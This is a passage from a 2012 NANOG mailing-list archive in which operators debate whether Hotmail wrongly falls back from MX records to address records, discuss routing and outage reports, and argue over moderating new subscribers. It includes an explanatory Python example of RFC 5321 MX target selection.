That it would be possible (and I'm not saying this is what is happening, but … it could be) … That an internal process could go resolving MX records, and adds them all to an internal table, until it figures it's got 'em all… "Gotta Get 'Em All!" … and maybe, just maybe … it exhausts the table space, and gives up, and tries the A record. I'm not saying this would be "Standard". I'm not saying this is the best, or perhaps even an acceptable way to do it. Or that it is in fact what is happening. But the config looked weird, and I can imagine … a system being written as described … and breaking just this way given that MX configuration. I can imagine Test … not catching it. Aloha, Michael. -- "Please have your Internet License and Usenet Registration handy..." From jlewis at lewis.org Fri Jul 27 22:31:24 2012 From: jlewis at lewis.org (Jon Lewis) Date: Fri, 27 Jul 2012 23:31:24 -0400 (EDT) Subject: Dreamhost in the house? Message-ID: If anyone from Dreamhost participates here, I'd like to talk about an apparent routing issue you may have with reaching anything originating in AS6364. Specifically, I'm able to reach IPs in 208.113.240.0/24 from off-net (outside AS6364) machines, and from a customer owned CIDR to which we provide transit, but not from any of our CIDRs. ---------------------------------------------------------------------- Jon Lewis, MCP :) | I route Senior Network Engineer | therefore you are Atlantic Net | _________ http://www.lewis.org/~jlewis/pgp for PGP public key_________ From marka at isc.org Fri Jul 27 22:47:13 2012 From: marka at isc.org (Mark Andrews) Date: Sat, 28 Jul 2012 13:47:13 +1000 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: Your message of "Fri, 27 Jul 2012 19:30:40 MST."
<25F0B21A-0319-45E3-9DBF-9906CB77AC6C@kapu.net> References: <20120726071441.GA11199@metron.com> <9234A38C-7DDE-4A3D-B859-01E7D94447D8@dotat.at> <50134302.2010800@tiggee.com> <25F0B21A-0319-45E3-9DBF-9906CB77AC6C@kapu.net> Message-ID: <20120728034714.9AB1B2319025@drugs.dv.isc.org> In message <25F0B21A-0319-45E3-9DBF-9906CB77AC6C at kapu.net>, Michael J Wise writes: > > On Jul 27, 2012, at 6:40 PM, David Miller wrote: > > > MX records don't "chain". > > But they do, "Expand". > And I can think of a way whereby if an MX record referenced itself, > *AND* included something extra … (did you see the something extra?) > > That it would be possible (and I'm not saying this is what is happening, > but … it could be) … > That an internal process could go resolving MX records, and adds them > all to an internal table, until it figures it's got 'em all… > > "Gotta Get 'Em All!" > > … and maybe, just maybe … it exhausts the table space, and gives up, > and tries the A record. > > I'm not saying this would be "Standard". It would be broken. MX records say which machines are set up to receive email for a domain. Delivering it elsewhere, unless explicitly overridden (e.g. smarthost), is a security flaw in the MTA. > I'm not saying this is the best, or perhaps even an acceptable way to do > it. > Or that it is in fact what is happening. > > But the config looked weird, and I can imagine … a system being > written as described … and breaking just this way given that MX > configuration. > I can imagine Test … not catching it. > > Aloha, > Michael. > -- > "Please have your Internet License > and Usenet Registration handy..." > > -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From mjwise at kapu.net Fri Jul 27 23:45:39 2012 From: mjwise at kapu.net (Michael J Wise) Date: Fri, 27 Jul 2012 21:45:39 -0700 Subject: Is Hotmail in the habit of ignoring MX records?
In-Reply-To: <20120728034714.9AB1B2319025@drugs.dv.isc.org> References: <20120726071441.GA11199@metron.com> <9234A38C-7DDE-4A3D-B859-01E7D94447D8@dotat.at> <50134302.2010800@tiggee.com> <25F0B21A-0319-45E3-9DBF-9906CB77AC6C@kapu.net> <20120728034714.9AB1B2319025@drugs.dv.isc.org> Message-ID: <114E6E78-521D-4822-AFCC-BDC7C10CA6CA@kapu.net> On Jul 27, 2012, at 8:47 PM, Mark Andrews wrote: > In message <25F0B21A-0319-45E3-9DBF-9906CB77AC6C at kapu.net>, Michael J Wise writes: >> >> On Jul 27, 2012, at 6:40 PM, David Miller wrote: >> >>> MX records don't "chain". >> >> But they do, "Expand". >> And I can think of a way whereby if an MX record referenced itself, >> *AND* included something extra … (did you see the something extra?) >> >> That it would be possible (and I'm not saying this is what is happening, >> but … it could be) … >> That an internal process could go resolving MX records, and adds them >> all to an internal table, until it figures it's got 'em all… >> >> "Gotta Get 'Em All!" >> >> … and maybe, just maybe … it exhausts the table space, and gives up, >> and tries the A record. >> >> I'm not saying this would be "Standard". > > It would be broken. I'm not disputing it. I'm also not saying it is, or it isn't, because I don't know. What I am saying is, what I do know is, that you probably can't open a Sev A DCR ticket with HotMail, and neither can I. That, and … it would seem there may be two things broken. And that fixing the MX "recursion" may re-cloak the apparent bug in HotMail. Maybe. Which one can be fixed faster? Aloha, Michael. -- "Please have your Internet License and Usenet Registration handy..."
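The rule Mark Andrews states above (MX records name the hosts that receive mail for a domain, and an MTA that delivers anywhere else is flawed) comes down to how the sending MTA reacts to each possible outcome of its MX query: a list of records, an empty answer, a non-existent name, or a lookup that simply failed. The Python below is an added example for this thread, not code from any poster or from any real MTA; the zone contents, the resolver and every host name in it are constructed. It models the RFC 5321 section 5.1 selection step beside the "MX-oblivious" shortcut that treats a failed lookup as if no MX records existed and falls back to the domain's own address records, which is exactly the behaviour that lands mail on a web server.

```python
"""RFC 5321 section 5.1 target selection: turning the result of an MX query
into a delivery decision.

Added example for this thread, not code from any poster or any real MTA.
The zone data, the resolver and all host names are constructed."""
from dataclasses import dataclass, field
from enum import Enum
from typing import Callable, Dict, List, Tuple


class RCode(Enum):
    """Outcome of the MX query as the MTA sees it."""
    NOERROR = "NOERROR"    # authoritative answer; an empty record list is NODATA
    NXDOMAIN = "NXDOMAIN"  # authoritative: the name does not exist at all
    SERVFAIL = "SERVFAIL"  # the lookup failed; nothing was learned about the name
    TIMEOUT = "TIMEOUT"    # same: nothing was learned


@dataclass
class MXAnswer:
    rcode: RCode
    records: List[Tuple[int, str]] = field(default_factory=list)  # (preference, target)


class Decision(Enum):
    USE_MX = "use-mx"          # deliver to the MX targets, lowest preference first
    IMPLICIT_MX = "implicit"   # NODATA: the domain itself is the implicit MX (RFC 5321 5.1)
    DEFER = "defer"            # transient failure: queue the message and retry later
    BOUNCE = "bounce"          # the name does not exist, so no address records can exist either


Resolver = Callable[[str], MXAnswer]


def choose_targets(domain: str, resolve_mx: Resolver) -> Tuple[Decision, List[str]]:
    """Conforming selection: only a definitive answer moves delivery off the MX hosts."""
    answer = resolve_mx(domain)
    if answer.rcode in (RCode.SERVFAIL, RCode.TIMEOUT):
        # A failed lookup is not "no MX records": the MX hosts may exist and we did not see them.
        return Decision.DEFER, []
    if answer.rcode is RCode.NXDOMAIN:
        return Decision.BOUNCE, []
    if not answer.records:
        return Decision.IMPLICIT_MX, [domain]
    # Lowest preference first; ties keep answer order here (a production MTA shuffles them).
    # Targets are looked up for A/AAAA only; an MX target never gets its own MX query.
    ordered = sorted(answer.records, key=lambda rec: rec[0])
    return Decision.USE_MX, [target for _, target in ordered]


def mx_oblivious_targets(domain: str, resolve_mx: Resolver) -> Tuple[Decision, List[str]]:
    """The broken shortcut: anything other than a populated MX answer, a failed lookup
    included, falls back to the domain's own address records, so mail can reach a host
    the domain owner never named in an MX record."""
    answer = resolve_mx(domain)
    if answer.rcode is RCode.NOERROR and answer.records:
        ordered = sorted(answer.records, key=lambda rec: rec[0])
        return Decision.USE_MX, [target for _, target in ordered]
    return Decision.IMPLICIT_MX, [domain]


# Constructed zone data standing in for real DNS responses.
CONSTRUCTED_MX: Dict[str, MXAnswer] = {
    "example.com":       MXAnswer(RCode.NOERROR, [(20, "mx2.example.com"), (10, "mx1.example.com")]),
    "nomx.example.com":  MXAnswer(RCode.NOERROR),   # NODATA: a host that takes mail directly
    "flaky.example.com": MXAnswer(RCode.SERVFAIL),  # the MX query itself failed
    "gone.example.com":  MXAnswer(RCode.NXDOMAIN),
}


def constructed_resolver(domain: str) -> MXAnswer:
    """Stand-in for a DNS resolver; unknown names are treated as NXDOMAIN."""
    return CONSTRUCTED_MX.get(domain, MXAnswer(RCode.NXDOMAIN))


if __name__ == "__main__":
    for name in CONSTRUCTED_MX:
        good = choose_targets(name, constructed_resolver)
        bad = mx_oblivious_targets(name, constructed_resolver)
        print(f"{name:20} conforming={good[0].value:9} {good[1]}  "
              f"oblivious={bad[0].value:9} {bad[1]}")
```

The two functions agree on every definitive answer and differ only on the failure case: the conforming one queues the message and retries, the oblivious one connects to whatever answers on port 25 at the domain's own address. Treating NXDOMAIN as permanent is a design choice of this example, since the same name cannot carry address records either and there is nothing to fall back to.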
From grizz at dipd.com Sat Jul 28 16:36:36 2012 From: grizz at dipd.com (Matt Griswold) Date: Sat, 28 Jul 2012 16:36:36 -0500 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts Message-ID: <20120728163636.49bf4f44@segv> As a quick update, we've implemented some list settings last week to help to keep spam off the list. New subscribers are moderated until we're comfortable with their posts. We rejected the idea of keyword based message filtering since not only is a lot of work to maintain, it's trivial to get around it if you really want to post banned words. Comments and suggestions are welcome. Matt Griswold, on behalf of the NANOG Communications Committee From mark.tinka at seacom.mu Sun Jul 29 09:12:03 2012 From: mark.tinka at seacom.mu (Mark Tinka) Date: Sun, 29 Jul 2012 16:12:03 +0200 Subject: Rate shaping in Active E FTTx networks Message-ID: <201207291612.04112.mark.tinka@seacom.mu> On Thursday, July 26, 2012 09:45:14 PM Jason Lixfeld wrote: > Is that a lot to ask for one box? The ridiculously deep > buffers required in order to shape to PIR vs. police to > it (because policing to a PIR is just plain ugly) and > the requirements to perform any sort of preferential > packet treatment above and beyond that seem like quite a > lot to ask of one box. Am I wrong? Having used middleware in the past to do bandwidth management, this doesn't scale well when your network grows, and when off-net traffic (including that between your own customers) is coming in from several points in the backbone. On smaller networks, having middleware is easy because your exit points are finite and fairly static. When you grow and start peering, taking on several large customers that want to talk to each other across your network, middleware becomes cumbersome to deploy, because then not only can't you assume that 80% of your traffic is HTTP, but you also can't assume that 80% of your traffic is toward your upstreams. 
Moreover, adding redundancy (as in multiple links between routers/switches) makes the situation worse, because middleware might not be as inclined, and arbitration of bandwidth management across multiple middleware devices to avoid accidentally over-provisioning to customers gets expensive and complex. I've since migrated to performing bandwidth management in the router gear itself. This is easy if you're using high- end kit (think Juniper M/MX/T, Cisco ASR1000/9000), but significantly less so on wireline Metro-E networks (where your Active-E comes in). But not anymore - there have been meaningful developments in this area, and for some I've had the pleasure of deploying, e.g., Cisco's ME3600X/3800X. There also alternatives like Juniper's MX80 (too big, I think, but the smallest you can get from them now) and Brocade's NetIron CES/CER2000 units. These allow you to not only gain decent feature set in the Access, but also let you extend IP (and MPLS) into the edge too for additional simplicity. Hope this helps. Cheers Mark. -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: This is a digitally signed message part. URL: From bill at herrin.us Sun Jul 29 20:46:44 2012 From: bill at herrin.us (William Herrin) Date: Sun, 29 Jul 2012 21:46:44 -0400 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: <20120727024538.46BAF23125D1@drugs.dv.isc.org> References: <20120726071441.GA11199@metron.com> <20120726083535.GA13414@metron.com> <20120727013411.A55B12311FA5@drugs.dv.isc.org> <20120727024538.46BAF23125D1@drugs.dv.isc.org> Message-ID: On Thu, Jul 26, 2012 at 10:45 PM, Mark Andrews wrote: > In message , Michael J Wise writ > es: >> And maybe an endless loop for an MX lookup might be what is causing = >> hotmail to panic and throw out the MX records. > > You don't lookup MX records for MX targets. This is basic MTA > processing. Correct. 
An MX record points to a label containing one or more address records. It does not chain. In principle the MX record could point to a CNAME record which then chains until it reaches an address record but I wouldn't depend on such a configuration working correctly. Ditto the MX lookup fetching a CNAME which chains until it reaches a label with an MX record. > You don't depend on ALL (ANY) returning MX records as they may not > be in the cache. You need to make a explict MX query you get no > MX records are returned in response to a ALL query. Also correct. > If the MX lookup fails, as apposed to returns nodata, you don't > lookup the A/AAAA records and synthesis a MX record. You treat it > as a soft error and queue for retry later. Again this is basic MTA > processing. Maybe. In principle this is correct but as you wander through various bits of software in the name lookup process (which often consults more than just the DNS -- even today DNS isn't the only game in town) it's pretty easy to lose track of the difference between lookup failure and success:no data. Think about it... how is the MTA to respond if the primary lookup reports success:no data (e.g. /etc/hosts) but a second tier lookup (e.g. DNS) reports lookup failure? What if DNS is third tier and the second tier is some kind of CIFS or NIS lookup which fails? Or reports success:no data. Or the DNS gets translated through a middleman (like NIS) which doesn't preserve the difference between fail and success no data. Does the whole lookup fail because part did? Gets ambiguous. Further, falling back to the address lookup in the absence of MX records is correct behavior for an MTA. What *should* happen here is that the guy's web server should reject the port 25 connection (an SMTP soft fail condition) and on the next retry hotmail should find the MX record and follow it. Either way, I think I'd have to consider this -advanced- MTA processing. You have to really know your stuff to get this one right. 
Regards, Bill Herrin -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004 From jamesl at mythostech.com Mon Jul 30 10:58:53 2012 From: jamesl at mythostech.com (James Laszko) Date: Mon, 30 Jul 2012 15:58:53 +0000 Subject: Global Crossing SJC Issues Message-ID: <8078ED370ADA824281219A7B5BADC39B1D833FCD@MBX023-W1-CA-5.exch023.domain.local> Does anyone have any information on a "network outage" with Global Crossing in the San Jose area? We've got hundreds of customers that use 8x8 VOIP services and they're all down. All the Global Crossing routes to 8x8 have vanished and the routes left are with Internap and don't appear to go anywhere... Curious if anyone has any information. Thanks! James Laszko Mythos Technology Inc jamesl at mythostech.com From marka at isc.org Mon Jul 30 12:03:30 2012 From: marka at isc.org (Mark Andrews) Date: Tue, 31 Jul 2012 03:03:30 +1000 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: Your message of "Sun, 29 Jul 2012 21:46:44 -0400." References: <20120726071441.GA11199@metron.com> <20120726083535.GA13414@metron.com> <20120727013411.A55B12311FA5@drugs.dv.isc.org> <20120727024538.46BAF23125D1@drugs.dv.isc.org> Message-ID: <20120730170330.C039F23218DD@drugs.dv.isc.org> In message , William Herrin writes: > On Thu, Jul 26, 2012 at 10:45 PM, Mark Andrews wrote: > > In message , Michael J Wise writ > > es: > >> And maybe an endless loop for an MX lookup might be what is causing = > >> hotmail to panic and throw out the MX records. > > > > You don't lookup MX records for MX targets. This is basic MTA > > processing. > > Correct. An MX record points to a label containing one or more address > records. It does not chain. In principle the MX record could point to > a CNAME record which then chains until it reaches an address record > but I wouldn't depend on such a configuration working correctly. 
Ditto > the MX lookup fetching a CNAME which chains until it reaches a label > with an MX record. > > > You don't depend on ALL (ANY) returning MX records as they may not > > be in the cache. You need to make a explict MX query you get no > > MX records are returned in response to a ALL query. > > Also correct. > > > If the MX lookup fails, as apposed to returns nodata, you don't > > lookup the A/AAAA records and synthesis a MX record. You treat it > > as a soft error and queue for retry later. Again this is basic MTA > > processing. > > Maybe. In principle this is correct but as you wander through various > bits of software in the name lookup process (which often consults more > than just the DNS -- even today DNS isn't the only game in town) it's > pretty easy to lose track of the difference between lookup failure and > success:no data. But it is the only ones that returns MX records. If that step errors you need to retry later. If you get NXDOMAIN you go onto other address sources. > Think about it... how is the MTA to respond if the primary lookup > reports success:no data (e.g. /etc/hosts) but a second tier lookup > (e.g. DNS) reports lookup failure? What if DNS is third tier and the > second tier is some kind of CIFS or NIS lookup which fails? MX records can't be lookup up in /etc/hosts or in CIFS / NIS. You only look for address records *after* the MX lookup fails. > Or reports > success:no data. Or the DNS gets translated through a middleman (like > NIS) which doesn't preserve the difference between fail and success no > data. Does the whole lookup fail because part did? Gets ambiguous. > > Further, falling back to the address lookup in the absence of MX > records is correct behavior for an MTA. The key words above are "in the absence". Until you have determined that they are absent you don't fall back. 
> What *should* happen here is that the guy's web server should reject > the port 25 connection (an SMTP soft fail condition) and on the next > retry hotmail should find the MX record and follow it. No. It is perfectly legal for A to accept mail for B, B for C, C for D and D for A with all mail being delivered to a host with a different name than the mail domain. It is not and never has been correct processing to lookup addresses records for a domain if the MX lookup fails. nodata/nxdomain are not failures. > Either way, I think I'd have to consider this -advanced- MTA > processing. You have to really know your stuff to get this one right. No. This is the behaviour you get with a MX oblivious MTA. > Regards, > Bill Herrin > > > > -- > William D. Herrin ................ herrin at dirtside.com bill at herrin.us > 3005 Crane Dr. ...................... Web: > Falls Church, VA 22042-3004 -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From lists222 at m.l.vaunt.eu Mon Jul 30 14:04:36 2012 From: lists222 at m.l.vaunt.eu (Panashe Flack) Date: Mon, 30 Jul 2012 21:04:36 +0200 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts In-Reply-To: <20120728163636.49bf4f44@segv> References: <20120728163636.49bf4f44@segv> Message-ID: <20120730190436.8988.L@m.l.vaunt.eu> > As a quick update, we've implemented some list settings last week to help to > keep spam off the list. New subscribers are moderated until we're comfortable > with their posts. We rejected the idea of keyword based message filtering > since not only is a lot of work to maintain, it's trivial to get around it if > you really want to post banned words. > > Comments and suggestions are welcome. > > > Matt Griswold, on behalf of the NANOG Communications Committee > I dislike this change - how long are subscribers considered "new"? 
I believe (and I hope I'm wrong) that with this new rule the nanog maiing list will turn into another fulldisc (list activity greatly reduced) by this change. Before this change I had thought of nanog as the new fulldisc - I guess I will have to find yet ANOTHER mailing list for continued activity. And just for reference - have you guys SEEN the "Linux Kernel Mailing List"? - it gets frequent spam posts and yet is perfectly able to ignore the spam/irrelevant posts and continue on its remit. From valdis.kletnieks at vt.edu Mon Jul 30 12:35:35 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Mon, 30 Jul 2012 13:35:35 -0400 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts In-Reply-To: Your message of "Mon, 30 Jul 2012 21:04:36 +0200." <20120730190436.8988.L@m.l.vaunt.eu> References: <20120728163636.49bf4f44@segv> <20120730190436.8988.L@m.l.vaunt.eu> Message-ID: <20721.1343669735@turing-police.cc.vt.edu> On Mon, 30 Jul 2012 21:04:36 +0200, Panashe Flack said: > list for continued activity. And just for reference - have you guys > SEEN the "Linux Kernel Mailing List"? - it gets frequent spam posts > and yet is perfectly able to ignore the spam/irrelevant posts and > continue on its remit. For those who don't drink from the Linux-Kernel firehose, it averages 1 or 2 spams per day - and anywhere from 500 to 700 postings a day. As Linus Torvalds said, back when it was averaging 200 a day: "Note that nobody reads every post in linux-kernel. In fact, nobody who expects to have time left over to actually do any real kernel work will read even half. Except Alan Cox, but he's actually not human, but about a thousand gnomes working in under-ground caves in Swansea. None of the individual gnomes read all the postings either, they just work together really well." The list managers do an incredible job of stopping spam - but even if 50 or 75 a day got through, they'd just be lost in the noise. 
You're skipping several hundred messages a day, skipping a few more isn't any different. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From patrick at ianai.net Mon Jul 30 12:42:21 2012 From: patrick at ianai.net (Patrick W. Gilmore) Date: Mon, 30 Jul 2012 13:42:21 -0400 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts In-Reply-To: <20721.1343669735@turing-police.cc.vt.edu> References: <20120728163636.49bf4f44@segv> <20120730190436.8988.L@m.l.vaunt.eu> <20721.1343669735@turing-police.cc.vt.edu> Message-ID: <8679FADA-327F-4586-928D-006A054E3686@ianai.net> I'm sorry Panashe is upset by this rule. Interestingly, "Your search - Panashe Flack nanog - did not match any documents." So my guess is that a post from that account has not happened before, meaning the post was moderated yet still made it through. Has anyone done a data mining experiment to see how many posts a month are from "new" members? My guess is it is a trivial percentage. -- TTFN, patrick On Jul 30, 2012, at 13:35 , valdis.kletnieks at vt.edu wrote: > On Mon, 30 Jul 2012 21:04:36 +0200, Panashe Flack said: >> list for continued activity. And just for reference - have you guys >> SEEN the "Linux Kernel Mailing List"? - it gets frequent spam posts >> and yet is perfectly able to ignore the spam/irrelevant posts and >> continue on its remit. > > For those who don't drink from the Linux-Kernel firehose, it averages > 1 or 2 spams per day - and anywhere from 500 to 700 postings a day. > > As Linus Torvalds said, back when it was averaging 200 a day: > > "Note that nobody reads every post in linux-kernel. In fact, nobody who > expects to have time left over to actually do any real kernel work will > read even half. Except Alan Cox, but he's actually not human, but about > a thousand gnomes working in under-ground caves in Swansea. 
None of the > individual gnomes read all the postings either, they just work together > really well." > > The list managers do an incredible job of stopping spam - but even if > 50 or 75 a day got through, they'd just be lost in the noise. You're skipping > several hundred messages a day, skipping a few more isn't any different. > From shrdlu at deaddrop.org Mon Jul 30 12:57:28 2012 From: shrdlu at deaddrop.org (Etaoin Shrdlu) Date: Mon, 30 Jul 2012 10:57:28 -0700 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts In-Reply-To: <20120730190436.8988.L@m.l.vaunt.eu> References: <20120728163636.49bf4f44@segv> <20120730190436.8988.L@m.l.vaunt.eu> Message-ID: <5016CB08.7020901@deaddrop.org> On 7/30/2012 12:04 PM, Panashe Flack wrote: >> As a quick update, we've implemented some list settings last week to help to >> keep spam off the list. New subscribers are moderated until we're comfortable >> with their posts... > I dislike this change - how long are subscribers considered "new"? I applaud this change. If I still traveled, I'd show up to the next NANOG, and buy the committee a beer. Instead, I send them my thanks. I run a couple of mailing lists, and every once in a while, someone will subscribe and set off my cynicism meter. I hit the moderate button on the new account, and sad to say, I've only been wrong to do so once, out of the last ten times I did it. Thanks again. -- "My name is Ozymandias, king of kings: Look on my works, ye Mighty, and despair!" Nothing beside remains. Round the decay Of that colossal wreck, boundless and bare The lone and level sands stretch far away. 
From snoble at sonn.com Mon Jul 30 12:57:46 2012 From: snoble at sonn.com (Steven Noble) Date: Mon, 30 Jul 2012 10:57:46 -0700 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts In-Reply-To: <8679FADA-327F-4586-928D-006A054E3686@ianai.net> References: <20120728163636.49bf4f44@segv> <20120730190436.8988.L@m.l.vaunt.eu> <20721.1343669735@turing-police.cc.vt.edu> <8679FADA-327F-4586-928D-006A054E3686@ianai.net> Message-ID: <8929F2FB-6E61-41D9-9C39-621127F2929D@sonn.com> The fix for this issue is trivial. Every new signup should require a sponsor or a deposit of funds into a new member fund. Once a member has made a relevant post regarding a NANOG related item their funds are returned. If someone spams they forfeit the money and it is used to help defray the costs of attending NANOG for the 99%. If the poster has been sponsored by a current member, said member is flogged in public at the next meeting. ...runs Sent from my iPhone On Jul 30, 2012, at 10:42 AM, "Patrick W. Gilmore" wrote: > I'm sorry Panashe is upset by this rule. Interestingly, "Your search - Panashe Flack nanog - did not match any documents." So my guess is that a post from that account has not happened before, meaning the post was moderated yet still made it through. > > Has anyone done a data mining experiment to see how many posts a month are from "new" members? My guess is it is a trivial percentage. > > -- > TTFN, > patrick > > > On Jul 30, 2012, at 13:35 , valdis.kletnieks at vt.edu wrote: >> On Mon, 30 Jul 2012 21:04:36 +0200, Panashe Flack said: >>> list for continued activity. And just for reference - have you guys >>> SEEN the "Linux Kernel Mailing List"? - it gets frequent spam posts >>> and yet is perfectly able to ignore the spam/irrelevant posts and >>> continue on its remit. >> >> For those who don't drink from the Linux-Kernel firehose, it averages >> 1 or 2 spams per day - and anywhere from 500 to 700 postings a day. 
>> >> As Linus Torvalds said, back when it was averaging 200 a day: >> >> "Note that nobody reads every post in linux-kernel. In fact, nobody who >> expects to have time left over to actually do any real kernel work will >> read even half. Except Alan Cox, but he's actually not human, but about >> a thousand gnomes working in under-ground caves in Swansea. None of the >> individual gnomes read all the postings either, they just work together >> really well." >> >> The list managers do an incredible job of stopping spam - but even if >> 50 or 75 a day got through, they'd just be lost in the noise. You're skipping >> several hundred messages a day, skipping a few more isn't any different. >> > > From randy at psg.com Mon Jul 30 13:15:32 2012 From: randy at psg.com (Randy Bush) Date: Mon, 30 Jul 2012 11:15:32 -0700 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts In-Reply-To: <5016CB08.7020901@deaddrop.org> References: <20120728163636.49bf4f44@segv> <20120730190436.8988.L@m.l.vaunt.eu> <5016CB08.7020901@deaddrop.org> Message-ID: > I applaud this change. thanks MLC or whatever it calls itself this week randy From rgolodner at infratection.com Mon Jul 30 13:51:39 2012 From: rgolodner at infratection.com (rgolodner at infratection.com) Date: Mon, 30 Jul 2012 18:51:39 +0000 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts Message-ID: <714340437-1343674300-cardhu_decombobulator_blackberry.rim.net-1722338433-@b25.c10.bise6.blackberry> I as well think some temporary moderation is a good idea. It would have been nice to think we were all mature enough to have ignored such spew. I will continue to have faith and wish the moderators a very light work load. Richard Golodner ------Original Message------ From: Randy Bush To: Etaoin Shrdlu Cc: nanog at nanog.org Subject: Re: Update from the NANOG Communications Committee regarding recent off-topic posts Sent: Jul 30, 2012 13:15 > I applaud this change. 
thanks MLC or whatever it calls itself this week randy Sent via BlackBerry from T-Mobile From joelja at bogus.com Mon Jul 30 14:04:21 2012 From: joelja at bogus.com (joel jaeggli) Date: Mon, 30 Jul 2012 12:04:21 -0700 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts In-Reply-To: <8929F2FB-6E61-41D9-9C39-621127F2929D@sonn.com> References: <20120728163636.49bf4f44@segv> <20120730190436.8988.L@m.l.vaunt.eu> <20721.1343669735@turing-police.cc.vt.edu> <8679FADA-327F-4586-928D-006A054E3686@ianai.net> <8929F2FB-6E61-41D9-9C39-621127F2929D@sonn.com> Message-ID: <5016DAB5.6060905@bogus.com> On 7/30/12 10:57 AM, Steven Noble wrote: > The fix for this issue is trivial. Every new signup should require a sponsor or a deposit of funds into a new member fund. Once a member has made a relevant post regarding a NANOG related item their funds are returned. > > If someone spams they forfeit the money and it is used to help defray the costs of attending NANOG for the 99%. > > If the poster has been sponsored by a current member, said member is flogged in public at the next meeting. Most of the subscribers to the mailing list never post. > ...runs > > Sent from my iPhone > > On Jul 30, 2012, at 10:42 AM, "Patrick W. Gilmore" wrote: > >> I'm sorry Panashe is upset by this rule. Interestingly, "Your search - Panashe Flack nanog - did not match any documents." So my guess is that a post from that account has not happened before, meaning the post was moderated yet still made it through. >> >> Has anyone done a data mining experiment to see how many posts a month are from "new" members? My guess is it is a trivial percentage. >> >> -- >> TTFN, >> patrick >> >> >> On Jul 30, 2012, at 13:35 , valdis.kletnieks at vt.edu wrote: >>> On Mon, 30 Jul 2012 21:04:36 +0200, Panashe Flack said: >>>> list for continued activity. And just for reference - have you guys >>>> SEEN the "Linux Kernel Mailing List"? 
- it gets frequent spam posts >>>> and yet is perfectly able to ignore the spam/irrelevant posts and >>>> continue on its remit. >>> For those who don't drink from the Linux-Kernel firehose, it averages >>> 1 or 2 spams per day - and anywhere from 500 to 700 postings a day. >>> >>> As Linus Torvalds said, back when it was averaging 200 a day: >>> >>> "Note that nobody reads every post in linux-kernel. In fact, nobody who >>> expects to have time left over to actually do any real kernel work will >>> read even half. Except Alan Cox, but he's actually not human, but about >>> a thousand gnomes working in under-ground caves in Swansea. None of the >>> individual gnomes read all the postings either, they just work together >>> really well." >>> >>> The list managers do an incredible job of stopping spam - but even if >>> 50 or 75 a day got through, they'd just be lost in the noise. You're skipping >>> several hundred messages a day, skipping a few more isn't any different. >>> >> > From bill at herrin.us Mon Jul 30 15:07:37 2012 From: bill at herrin.us (William Herrin) Date: Mon, 30 Jul 2012 10:07:37 -1000 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: <20120730170330.C039F23218DD@drugs.dv.isc.org> References: <20120726071441.GA11199@metron.com> <20120726083535.GA13414@metron.com> <20120727013411.A55B12311FA5@drugs.dv.isc.org> <20120727024538.46BAF23125D1@drugs.dv.isc.org> <20120730170330.C039F23218DD@drugs.dv.isc.org> Message-ID: On Mon, Jul 30, 2012 at 7:03 AM, Mark Andrews wrote: > In message , William Herrin writes: >> What *should* happen here is that the guy's web server should reject >> the port 25 connection (an SMTP soft fail condition) and on the next >> retry hotmail should find the MX record and follow it. > > No. It is perfectly legal for A to accept mail for B, B for C, C > for D and D for A with all mail being delivered to a host with a > different name than the mail domain. 
It is not and never has been > correct processing to lookup addresses records for a domain if the > MX lookup fails. nodata/nxdomain are not failures. Hi Mark, If you can reference where in the SMTP RFC it offers an authoritative explanation what to do when merging results from various naming systems where one but not all of the naming systems has generated an error then let's read it. If not... your common sense says one thing, mine says another and folks implementing mail systems should be aware the implications. Until then, my view is that a lookup failure when seeking an MX record should only block the MTA from seeking an address record in the DNS. It should still seek an address record in higher priority naming systems and use it if it finds one. If correct, and I think it is, that's a pretty subtle thing to program for... something easily gotten wrong. Regards, Bill Herrin -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004 From valdis.kletnieks at vt.edu Mon Jul 30 15:26:10 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Mon, 30 Jul 2012 16:26:10 -0400 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: Your message of "Mon, 30 Jul 2012 10:07:37 -1000." References: <20120726071441.GA11199@metron.com> <20120726083535.GA13414@metron.com> <20120727013411.A55B12311FA5@drugs.dv.isc.org> <20120727024538.46BAF23125D1@drugs.dv.isc.org> <20120730170330.C039F23218DD@drugs.dv.isc.org> Message-ID: <30240.1343679970@turing-police.cc.vt.edu> On Mon, 30 Jul 2012 10:07:37 -1000, William Herrin said: > If you can reference where in the SMTP RFC it offers an authoritative > explanation what to do when merging results from various naming > systems where one but not all of the naming systems has generated an > error then let's read it. RFC5321, section 5.1 is pretty clear on it: 5.1. 
